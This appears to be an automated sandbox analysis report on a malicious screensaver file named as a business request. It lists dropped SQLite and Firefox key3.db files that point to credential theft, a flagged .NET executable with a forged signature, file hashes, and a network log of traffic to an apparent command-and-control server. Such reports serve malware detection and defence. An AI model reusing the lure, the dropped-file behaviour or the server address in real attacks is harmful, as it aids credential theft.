Preview:	SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Urmvri.tmpdb

Download File

Process:	C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
File Type:	SQLite 3.x database, last written using SQLite version 3008001, file counter 13, database pages 30, 1st free page 27, free pages 1, cookie 0x1e, schema 4, UTF-8, version-valid-for 13
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	1.4530338001328815
Encrypted:	false
SSDEEP:	3072:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApNVuVvY:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApr
MD5:	9DEFC75D6086CCDBE05ED9EE2159CF84
SHA1:	BCF6B1893581F2420564160F784E47E91946269A
SHA-256:	04F89C6DE1CA272A5019395A923DEAE68D5F47641AD5623606E3D092BAA7245A
SHA-512:	D92A772BF416D7BCF0FF3F940E3ECDC4B2130060E85C1EBBBFDD108F535B28F034E1FAD846812607548B02D7AD4DC2BCD11546822E38A6F60ED2D87EB7F5D686
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................-......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Uwdvtizbx.tmpdb

Download File

Process:	C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
File Type:	SQLite 3.x database, user version 35, last written using SQLite version 3008001, page size 32768, writer version 2, read version 2, file counter 3, database pages 35, cookie 0x1d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	1146880
Entropy (8bit):	0.15644146423012004
Encrypted:	false
SSDEEP:	192:CdEcZ6zssdySB+exixS4fS4QS4NS4ibRqwxeKlZfTOmPp80WOpp:+EccZdD3yJnbkw0KlAo5H
MD5:	E28514A583D6F83F8C67CA62CB891CA7
SHA1:	4107934697F0891B26B16A6E0D9795271353355C
SHA-256:	B41E251C18B2B1CDD79E33F0B3AB12EAD8EF257969E26BFBB06DB7C70E9E0FFC
SHA-512:	BF83CD24FEA896D38F07EA61FA639FCE7CC637AB97C6DFE5A6502772DECC4835160F5F49442266024B6564947B0AFB72901A8B1C848AF00808F0A3E08B740E4E
Malicious:	false
Preview:	SQLite format 3......@ .......#...............................#.................................-...}.."l..~\}.\|.}M{.\|az.y.zdyqx.y8w.xJviu.t.tNs.sxs.r.r.q.p.pwp.o.n.nym.mRl.l.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Vloljy\7xwghk55.default\key3.db

Download File

Process:	C:\Users\user\AppData\Roaming\Kbojz.exe
File Type:	Berkeley DB 1.85 (Hash, version 2, native byte-order)
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	1.121508608738599
Encrypted:	false
SSDEEP:	3:Lt/hV/plfltt/lE9lllnldlHGltdl/l8/V0V6H/qSkBgRzc/e42jtgwS0dB7EWWD:5X9cvVmXy/VXXRYmFZtB7E0MH0cLD
MD5:	1DEFC9C4F8AFC884D5714DE065F88E3D
SHA1:	AE6ABD61EB9592F3804B80A0F4C4214AB2D85102
SHA-256:	6F30E3E5BC88098596885E89B129B847646BBE16B7537FB2A0D876AA8515BF02
SHA-512:	B1E4A625E6C3E24BDF5519C9D791E8C97E56381CF8882C4EC861CFC67F09811CED782E2CF51A0D55E434BF5EB5ACC2AA4DB0E7FBF1A7A3D06B5A3E0676360C54
Malicious:	false
Preview:	...a.............................................................n}.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Zfpoqrkrnxm.tmp

Download File

Process:	C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
File Type:	SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.3870145383915669
Encrypted:	false
SSDEEP:	48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
MD5:	1623709C6B2FB813984B1265C26A85F1
SHA1:	CCE4DDBE93E97E68359CB6FD71242F796A785F86
SHA-256:	88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
SHA-512:	6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................-........#..k...#.<....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Zlxloj.tmpdb

Download File

Process:	C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
File Type:	SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	77824
Entropy (8bit):	1.133993246026424
Encrypted:	false
SSDEEP:	96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
MD5:	8BB4851AE9495C7F93B4D8A6566E64DB
SHA1:	B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
SHA-256:	143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
SHA-512:	DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
Malicious:	false
Preview:	SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Zpbxo\7xwghk55.default\key3.db

Download File

Process:	C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
File Type:	Berkeley DB 1.85 (Hash, version 2, native byte-order)
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	1.121508608738599
Encrypted:	false
SSDEEP:	3:Lt/hV/plfltt/lE9lllnldlHGltdl/l8/V0V6H/qSkBgRzc/e42jtgwS0dB7EWWD:5X9cvVmXy/VXXRYmFZtB7E0MH0cLD
MD5:	1DEFC9C4F8AFC884D5714DE065F88E3D
SHA1:	AE6ABD61EB9592F3804B80A0F4C4214AB2D85102
SHA-256:	6F30E3E5BC88098596885E89B129B847646BBE16B7537FB2A0D876AA8515BF02
SHA-512:	B1E4A625E6C3E24BDF5519C9D791E8C97E56381CF8882C4EC861CFC67F09811CED782E2CF51A0D55E434BF5EB5ACC2AA4DB0E7FBF1A7A3D06B5A3E0676360C54
Malicious:	false
Preview:	...a.............................................................n}.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Kbojz.exe

Download File

Process:	C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	37688
Entropy (8bit):	5.858227307628902
Encrypted:	false
SSDEEP:	768:vCKxo5dcWZb35LhlEDSUOxpsFG+NU3hDf:zo5d9Zb35LhlEDSUOXsFG+W3hDf
MD5:	F99DC4D2E045AE0BBC169FFF12A5C6D5
SHA1:	C3A4A89907201776E9AD38FC63573522E0D233F1
SHA-256:	E4726C4CAD6DD043E87289A51733A6627B2ABF1AE88B70458C9674EF4669540C
SHA-512:	8DB711C745807AFD34DB67B2098229C53DA9E884A63D9322D016351DAB3CAD4D7B283CC43335EF924BA74DF44667BF6DC82E04A71396B64D92B64AC4BBF2E8EB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 64%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}..f.....................J.......2... ...@....@.. ....................................`.................................T2..L....@..gG...........`..83...........................................................2............... ..H............text........ ...................... ..`.rsrc...gG...@...H..................@..@.reloc...............^..............@..B................H........$..6............................................................0..........(....%(...+.(...+...(....(......(....(................>.......?R.....?)......?!.....=.......(....85......(....8(......=........(....8......(....8......X..X(............0..(...........8......]:......X.8......Y...X...2..........;.......;....8......Z.[..X.Z..Y.Z.~....%:....&~..........s....%......o.......0..>.......s....% ......s....o....% .......s....o....% .......s....o...........s...........(.

C:\Users\user\AppData\Roaming\Kbojz.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.858227307628902
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
File size:	37'688 bytes
MD5:	f99dc4d2e045ae0bbc169fff12a5c6d5
SHA1:	c3a4a89907201776e9ad38fc63573522e0d233f1
SHA256:	e4726c4cad6dd043e87289a51733a6627b2abf1ae88b70458c9674ef4669540c
SHA512:	8db711c745807afd34db67b2098229c53da9e884a63d9322d016351dab3cad4d7b283cc43335ef924ba74df44667bf6dc82e04a71396b64d92b64ac4bbf2e8eb
SSDEEP:	768:vCKxo5dcWZb35LhlEDSUOxpsFG+NU3hDf:zo5d9Zb35LhlEDSUOXsFG+W3hDf
TLSH:	EE039EC5DA342DD2F5F38D7C519D9A3A48EFB28CF6868A5B1058608D0A83FC32E155DD
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}..f.....................J.......2... ...@....@.. ....................................`................................

File Icon


Icon Hash:	126d6c6ce8335228

Static PE Info

General

Entrypoint:	0x4032a2
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x661D987D [Mon Apr 15 21:13:33 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Symantec Class 3 SHA256 Code Signing CA, OU=Symantec Trust Network, O=Symantec Corporation, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	2/6/2020 1:00:00 AM 3/2/2022 12:59:59 AM
Subject Chain	CN=Apple Inc., O=Apple Inc., L=Cupertino, S=California, C=US
Version:	3
Thumbprint MD5:	809816AE499D0D27A8A2D75BD4B983E3
Thumbprint SHA-1:	634A0D892E72161714861C178015AFE9C1832E14
Thumbprint SHA-256:	46CD03A1949C4452B35CCBCEBF84B13C63807D70ACDB61C19D109729254F372F
Serial:	4EF16586A2FF12D69C556EC4C91BAEE1

Entrypoint Preview

Instruction
jmp dword ptr [004032B0h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
test byte ptr [edx], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3254	0x4c	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x4767	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x6000	0x3338
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x32b0	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x12b8	0x1400	9aa05276129f7bd54f69f3d046cd316d	False	0.5373046875	data	5.2598298064109175	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x4000	0x4767	0x4800	18f86383f21a07bd35957271b50b233c	False	0.1713324652777778	data	3.8690914056220507	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa000	0xc	0x200	9da5c5c92091c67652731a1cc0eb4f46	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x4160	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	0.16489361702127658
RT_ICON	0x45d8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	0.08302063789868667
RT_ICON	0x5690	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	0.05259336099585062
RT_ICON	0x7c48	0x58b	PNG image data, 256 x 256, 8-bit colormap, non-interlaced	0.9859055673009162
RT_GROUP_ICON	0x81e3	0x3e	data	0.7903225806451613
RT_VERSION	0x8231	0x33c	data	0.4335748792270531
RT_MANIFEST	0x857d	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 19, 2024 16:16:43.509197950 CEST	49171	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:16:43.509253025 CEST	443	49171	13.107.137.11	192.168.2.22
Apr 19, 2024 16:16:43.509325027 CEST	49171	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:16:43.540064096 CEST	49171	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:16:43.540153980 CEST	443	49171	13.107.137.11	192.168.2.22
Apr 19, 2024 16:16:43.909827948 CEST	443	49171	13.107.137.11	192.168.2.22
Apr 19, 2024 16:16:43.909920931 CEST	49171	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:16:43.915847063 CEST	49171	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:16:43.915859938 CEST	443	49171	13.107.137.11	192.168.2.22
Apr 19, 2024 16:16:43.916332006 CEST	443	49171	13.107.137.11	192.168.2.22
Apr 19, 2024 16:16:44.006552935 CEST	49171	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:16:44.052109003 CEST	443	49171	13.107.137.11	192.168.2.22
Apr 19, 2024 16:16:44.807828903 CEST	443	49171	13.107.137.11	192.168.2.22
Apr 19, 2024 16:16:44.807954073 CEST	443	49171	13.107.137.11	192.168.2.22
Apr 19, 2024 16:16:44.812074900 CEST	49171	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:16:44.815817118 CEST	49171	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:16:46.735626936 CEST	49172	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:16:46.735717058 CEST	443	49172	13.107.137.11	192.168.2.22
Apr 19, 2024 16:16:46.735800028 CEST	49172	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:16:46.736366987 CEST	49172	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:16:46.736403942 CEST	443	49172	13.107.137.11	192.168.2.22
Apr 19, 2024 16:16:47.098617077 CEST	443	49172	13.107.137.11	192.168.2.22
Apr 19, 2024 16:16:47.106223106 CEST	49172	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:16:47.106259108 CEST	443	49172	13.107.137.11	192.168.2.22
Apr 19, 2024 16:16:47.729304075 CEST	443	49172	13.107.137.11	192.168.2.22
Apr 19, 2024 16:16:47.729407072 CEST	443	49172	13.107.137.11	192.168.2.22
Apr 19, 2024 16:16:47.730151892 CEST	49172	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:16:47.731913090 CEST	49172	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:16:52.609302044 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:52.855658054 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:52.855768919 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:57.875909090 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:58.178829908 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:58.178911924 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:58.443887949 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:58.444037914 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:58.444051981 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:58.444111109 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:58.444132090 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:58.655185938 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:58.690610886 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:58.690660954 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:58.690720081 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:58.690725088 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:58.690758944 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:58.690798044 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:58.690812111 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:58.901668072 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:58.901688099 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:58.901725054 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:58.937133074 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:58.937148094 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:58.937203884 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:58.937215090 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:58.937222958 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:58.937227011 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:58.937242985 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:58.937252998 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:58.937264919 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:58.937275887 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:58.937289000 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.138787031 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.148921967 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.148941040 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.148952007 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.149003029 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.149035931 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.149048090 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.149059057 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.149075985 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.183389902 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.183449030 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.183588028 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.183602095 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.183614016 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.183624983 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.183635950 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.183636904 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.183649063 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.183650017 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.183665037 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.183677912 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.183681965 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.183690071 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.183701038 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.183707952 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.183712006 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.183722973 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.183723927 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.183737040 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.183756113 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.385068893 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.385112047 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.385162115 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.395040989 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.395085096 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.395136118 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.395148993 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.395184040 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.395195961 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.395209074 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.395241976 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.395276070 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.395287991 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.395299911 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.395309925 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.395313025 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.395325899 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.395347118 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.429642916 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.429661989 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.429675102 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.429687023 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.429711103 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.429734945 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.429792881 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.429807901 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.429840088 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.429886103 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.429898977 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.429930925 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.429949045 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.429961920 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.429991961 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.430078030 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.430090904 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.430102110 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.430113077 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.430123091 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.430125952 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.430135012 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.430140018 CEST	49174	2442	192.168.2.22	80.85.152.161
